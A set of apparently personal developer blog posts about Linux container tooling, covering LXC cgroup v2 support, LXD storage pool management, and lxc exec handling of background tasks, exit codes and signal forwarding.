I’m excited to announce that we’ve recently added support for the new unified cgroup hierarchy (or cgroup v2, cgroup2) to LXC. This includes running system containers that know about the unified cgroup hierarchy and application containers that mostly won’t really care about the cgroup layout. I’m not going to do a deep dive into the differences between legacy cgroup hierarchies and the unified cgroup hierarchy here. But if you’re interested you can watch my talk at last year’s Container Camp Sydney.

**Here be dragons**: some of what I say is likely invalid by now or I've come up with simpler solutions.

Currently existing cgroup layouts

Let’s take a quick look at the different cgroup layouts out there. Currently, there are three known cgroup layouts that a container runtime should handle:

1. Legacy cgroup hierarchies

This means that only legacy cgroup controllers are enabled and mounted, either each into its own hierarchy or with several controllers co-mounted into a single hierarchy. The mount layout of a legacy cgroup hierarchy has been standardized in recent years. This is mainly due to the widespread use of systemd and its opinionated way of how legacy cgroups should be mounted (Note, this is not a critique.). A standard legacy cgroup layout will usually look like this:

├─/sys/fs/cgroup                    tmpfs  tmpfs  ro,nosuid,nodev,noexec,mode=755
│ ├─/sys/fs/cgroup/systemd          cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
│ ├─/sys/fs/cgroup/devices          cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
│ ├─/sys/fs/cgroup/blkio            cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
│ ├─/sys/fs/cgroup/cpu,cpuacct      cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
│ ├─/sys/fs/cgroup/cpuset           cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset,clone_children
│ ├─/sys/fs/cgroup/rdma             cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
│ ├─/sys/fs/cgroup/hugetlb          cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
│ ├─/sys/fs/cgroup/freezer          cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
│ ├─/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
│ ├─/sys/fs/cgroup/perf_event       cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
│ ├─/sys/fs/cgroup/pids             cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
│ └─/sys/fs/cgroup/memory           cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory

As you can see, most controllers (e.g. devices, blkio, cpuset) are mounted into their own separate cgroup hierarchy. They could be mounted differently, but given that this is how most userspace programs now mount cgroups and expect them to be mounted, other layouts rarely need to be supported.

2. Hybrid cgroup hierarchies

The mount layout of hybrid cgroup hierarchies is mostly identical to the mount layout of the legacy cgroup hierarchies. The only difference usually being that the unified cgroup hierarchy is mounted as well. The unified cgroup hierarchy can easily be spotted by looking at the FSTYPE field in the output of the findmnt command. For legacy cgroup hierarchies it will show cgroup as value and for the unified cgroup hierarchy it will show cgroup2 as value. In the output below the third field corresponds to the FSTYPE:

├─/sys/fs/cgroup                    tmpfs  tmpfs  ro,nosuid,nodev,noexec,mode=755
│ ├─/sys/fs/cgroup/unified          cgroup cgroup2 rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/cgroup/systemd          cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
│ ├─/sys/fs/cgroup/devices          cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
│ ├─/sys/fs/cgroup/blkio            cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
│ ├─/sys/fs/cgroup/cpu,cpuacct      cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
│ ├─/sys/fs/cgroup/cpuset           cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset,clone_children
│ ├─/sys/fs/cgroup/rdma             cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
│ ├─/sys/fs/cgroup/hugetlb          cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
│ ├─/sys/fs/cgroup/freezer          cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
│ ├─/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
│ ├─/sys/fs/cgroup/perf_event       cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
│ ├─/sys/fs/cgroup/pids             cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
│ └─/sys/fs/cgroup/memory           cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory

To be honest, this is not my favorite cgroup layout since it could potentially mean that some cgroup controllers are mounted into separate legacy hierarchies while others could be enabled in the unified cgroup hierarchy. That is not difficult but annoying to handle cleanly. However, systemd usually plays nice and only supports the empty unified cgroup hierarchy in hybrid cgroup layouts.

That is to say, all controllers are mounted into legacy cgroup hierarchies and the unified hierarchy is just used by systemd to track processes, essentially replacing the old named systemd legacy cgroup hierarchy.

3. Unified cgroup hierarchy

The last option is to only mount the unified cgroup hierarchy directly at /sys/fs/cgroup:

├─/sys/fs/cgroup cgroup cgroup2 rw,nosuid,nodev,noexec,relatime

This will likely be the near future.
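If you want to quickly check which of the three layouts a system is running, asking findmnt for cgroup2 filesystems is enough:

findmnt -t cgroup2 -n -o TARGET
# /sys/fs/cgroup/unified  -> hybrid layout
# /sys/fs/cgroup          -> unified layout
# no output               -> legacy layout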

LXC in current git master will support all three layouts properly, including setting resource limits. So far, LXC has only provided the lxc.cgroup.* namespace to set cgroup settings on legacy cgroup hierarchies. For example, to set a limit on the number of cpus on the cpuset legacy cgroup hierarchy one would simply specify lxc.cgroup.cpuset.cpus = 1-2 in the container’s config file. The idea behind this is that the lxc.cgroup.* namespace simply takes the name of a cgroup controller and a file that should be modified.

Similar to the lxc.cgroup.* legacy hierarchy namespace we have now introduced the lxc.cgroup2.* namespace which follows the exact same logic but allows setting cgroup limits on the unified hierarchy. This should allow users to easily and intuitively transition from legacy cgroup layouts to unified cgroup layouts in the near future if their distro of choice decides to make the switch.
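For illustration, here is what a hypothetical config using both namespaces could look like; memory.max and pids.max are standard unified hierarchy files and the values are made up:

# applied on legacy cgroup hierarchies
lxc.cgroup.memory.limit_in_bytes = 512M

# applied on the unified cgroup hierarchy
lxc.cgroup2.memory.max = 512M
lxc.cgroup2.pids.max = 100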

One of the first beneficiaries will be LXD since we have some users running on unified layouts. But of course, the feature is available to all users of the API of the LXC shared library.

Christian Brauner

Storage management in LXD 2.15


Introduction

For a long time LXD has supported multiple storage drivers. Users could choose between zfs, btrfs, lvm, or plain directory storage pools but they could only ever use a single storage pool. A frequent feature request was to support not just a single storage pool but multiple storage pools. This way users would for example be able to maintain a zfs storage pool backed by an SSD to be used by very I/O intensive containers and another simple directory based storage pool for other containers. Luckily, this is now possible since LXD gained its own storage management API a few versions back.

Creating storage pools

A new LXD installation comes without any storage pool defined. If you run lxd init LXD will offer to create a storage pool for you. The storage pool created by lxd init will be the default storage pool on which containers are created.

asciicast

Creating further storage pools

Our client tool makes it really simple to create additional storage pools. In order to create and administer new storage pools you can use the lxc storage command. So if you wanted to create an additional btrfs storage pool on a block device /dev/sdb you would simply use lxc storage create my-btrfs btrfs source=/dev/sdb. But let’s take a look:

asciicast

Creating containers on the default storage pool

If you started from a fresh install of LXD and created a storage pool via lxd init LXD will use this pool as the default storage pool. That means if you’re doing a lxc launch images:ubuntu/xenial xen1 LXD will create a storage volume for the container’s root filesystem on this storage pool. In our examples we’ve been using my-first-zfs-pool as our default storage pool:

asciicast

Creating containers on a specific storage pool

But you can also tell lxc launch and lxc init to create a container on a specific storage pool by simply passing the -s argument. For example, if you wanted to create a new container on the my-btrfs storage pool you would do lxc launch images:ubuntu/xenial xen-on-my-btrfs -s my-btrfs:

asciicast

Creating custom storage volumes

If you need additional space for one of your containers to, for example, store additional data, the new storage API will let you create storage volumes that can be attached to a container. This is as simple as doing lxc storage volume create my-btrfs my-custom-volume:

asciicast

Attaching custom storage volumes to containers

Of course this feature is only helpful because the storage API lets you attach those storage volumes to containers. To attach a storage volume to a container you can use lxc storage volume attach my-btrfs my-custom-volume xen1 data /opt/my/data:

asciicast

Sharing custom storage volumes between containers

By default LXD will make an attached storage volume writable by the container it is attached to. This means it will change the ownership of the storage volume to the container’s idmapping. But storage volumes can also be attached to multiple containers at the same time. This is great for sharing data among multiple containers. However, this comes with a few restrictions. In order for a storage volume to be attached to multiple containers they must all share the same idmapping. Let’s create an additional container xen-isolated that has an isolated idmapping. This means its idmapping will be unique in this LXD instance such that no other container has the same idmapping. Attaching the same storage volume my-custom-volume to this container will now fail:

asciicast

But let’s make xen-isolated have the same mapping as xen1 and let’s also rename it to xen2 to reflect that change. Now we can attach my-custom-volume to both xen1 and xen2 without a problem:

asciicast

Summary

The storage API is a very powerful addition to LXD. It provides a set of essential features that are helpful in dealing with a variety of problems when using containers at scale. This short introduction hopefully gave you an impression of what you can do with it. There will be more to come in the future.

Christian Brauner

lxc exec vs ssh


Recently, I’ve implemented several improvements for lxc exec. In case you didn’t know, lxc exec is LXD’s client tool that uses the LXD client API to talk to the LXD daemon and execute any program the user might want. Here is a small example of what you can do with it:

asciicast

One of our main goals is to make lxc exec feel as similar to ssh as possible since ssh is the standard way of running commands remotely, interactively or non-interactively. Making lxc exec behave nicely was tricky.

1. Handling background tasks

A long-standing problem was certainly how to correctly handle background tasks. Here’s an asciinema illustration of the problem with a pre LXD 2.7 instance:

asciicast

What you can see there is that putting a task in the background will lead to lxc exec not being able to exit. A lot of command sequences can trigger this problem:

chb@conventiont|~
> lxc exec zest1 bash
root@zest1:~# yes &
y
y
y
.
.
.

Nothing would save you now. yes will simply write to stdout till the end of time as quickly as it can… The root of the problem lies with stdout being kept open, which is necessary to ensure that any data written by the process the user has started is actually read and sent back over the websocket connection we established. As you can imagine this becomes a major annoyance when you e.g. run a shell session in which you want to run a process in the background and then quickly exit. Sorry, you are out of luck. Well, you were. The first and naive approach is obviously to simply close stdout as soon as you detect that the foreground program (e.g. the shell) has exited. Not quite as good an idea as one might think… The problem becomes obvious when you then run quickly executing programs like:

lxc exec -- ls -al /usr/lib

where the lxc exec process (and the associated forkexec process (Don’t worry about it now. Just remember that Go + setns() are not on speaking terms…)) exits before all buffered data in stdout was read. In this case you will cause truncated output and no one wants that. After a few approaches to the problem that involved disabling pty buffering (wasn’t pretty, I tell you that, and also didn’t work predictably) and other weird ideas I managed to solve this by employing a few poll() “tricks” (in some sense of the word “trick”). Now you can finally run background tasks and cleanly exit. To wit:

asciicast
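For the curious, the gist of the poll() trick is roughly the following (a sketch under my own assumptions, not LXD’s actual code): once the foreground process has exited, drain whatever the pty master still has buffered without blocking, then stop, even if a background process keeps the slave side open.

#include <poll.h>
#include <unistd.h>

static void drain_pty(int master_fd)
{
        char buf[4096];
        struct pollfd pfd = { .fd = master_fd, .events = POLLIN };

        for (;;) {
                /* Timeout 0: only report data that is already buffered. */
                if (poll(&pfd, 1, 0) <= 0)
                        break;

                if (!(pfd.revents & POLLIN))
                        break; /* POLLHUP/POLLERR: nothing left to read */

                ssize_t n = read(master_fd, buf, sizeof(buf));
                if (n <= 0)
                        break;

                /* ...forward the n bytes over the websocket here... */
        }
}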

2. Reporting exit codes caused by signals

ssh is a wonderful tool. One thing I never really liked, however, was the fact that when the command run by ssh received a signal, ssh would always report -1 aka exit code 255. This is annoying when you’d like to have information about what signal caused the program to terminate. This is why I recently implemented the shell convention of reporting any signal-caused exit as 128 + n, where n is the number of the signal that caused the executing program to exit. For example, on SIGKILL (signal 9) you would see 128 + 9 = 137 (Calculating the exit codes for other deadly signals is left as an exercise to the reader.). So you can do:

chb@conventiont|~
> lxc exec zest1 sleep 100

Now, send SIGKILL to the executing program (Not to lxc exec itself, as SIGKILL is not forwardable.):

kill -KILL $(pidof sleep)

and finally retrieve the exit code for your program:

chb@conventiont|~
> echo $?
137

Voila. This obviously only works nicely when a) the exit code doesn’t breach the 8-bit wall-of-computing and b) the executing program doesn’t use 137 to indicate success (Which would be… interesting(?).). Neither objection seems too convincing to me. The former because most deadly signals should not breach the range. The latter because (i) that’s the user’s problem, (ii) these exit codes are actually reserved (I think.), (iii) you’d have the same problem running the program locally or otherwise. The main advantage I see in this is the ability to report back fine-grained exit statuses for executing programs. Note, by no means can we report back all instances where the executing program was killed by a signal: e.g. when your program handles SIGTERM and exits cleanly there’s no easy way for LXD to detect this and report back that the program was killed by a signal. You will simply receive success aka exit code 0.
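For the curious, the mapping itself is trivial. A sketch in C (not LXD’s actual code) of what reporting 128 + n amounts to:

#include <sys/wait.h>

/* Map a waitpid() status to the exit code reported to the caller,
 * using the 128 + n convention for signal-caused exits. */
static int exit_code_from_wait_status(int status)
{
        if (WIFEXITED(status))
                return WEXITSTATUS(status);

        if (WIFSIGNALED(status))
                return 128 + WTERMSIG(status);

        return -1;
}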

3. Forwarding signals

This is probably the least interesting feature (or maybe it isn’t, no idea) but I found it quite useful. As you saw in the SIGKILL case before, I was explicit in pointing out that one must send SIGKILL to the executing program, not to the lxc exec command itself. This is due to the fact that SIGKILL cannot be handled in a program. The only thing the program can do is die… like right now… this instant… sofort… (You get the idea…). But a lot of other signals like SIGTERM, SIGHUP, and of course SIGUSR1 and SIGUSR2 can be handled. So when you send signals that can be handled to lxc exec instead of the executing program, newer versions of LXD will forward the signal to the executing process. This is pretty convenient in scripts and so on.
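A sketch (again my own, not LXD’s actual code) of what such forwarding boils down to: install handlers for the catchable signals you care about and re-raise them in the executing program.

#include <signal.h>
#include <stddef.h>
#include <sys/types.h>

static pid_t exec_pid; /* pid of the executing program */

/* Re-raise the received signal in the executing program. SIGKILL and
 * SIGSTOP can never be caught, which is why they can't be forwarded
 * this way. */
static void forward_signal(int signo)
{
        kill(exec_pid, signo);
}

static void install_signal_forwarders(void)
{
        const int sigs[] = { SIGTERM, SIGHUP, SIGUSR1, SIGUSR2 };
        struct sigaction sa = { .sa_handler = forward_signal };

        sigemptyset(&sa.sa_mask);
        for (size_t i = 0; i < sizeof(sigs) / sizeof(sigs[0]); i++)
                sigaction(sigs[i], &sa, NULL);
}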

In any case, I hope you found this little lxc exec post/rant useful. Enjoy LXD, it’s a crazy beautiful beast to play with. Give it a try online at https://linuxcontainers.org/lxd/try-it/ and for all you developers out there: check out https://github.com/lxc/lxd and send us patches. :) We don’t require any CLA to be signed, we simply follow the kernel style of requiring a Signed-off-by line. :)
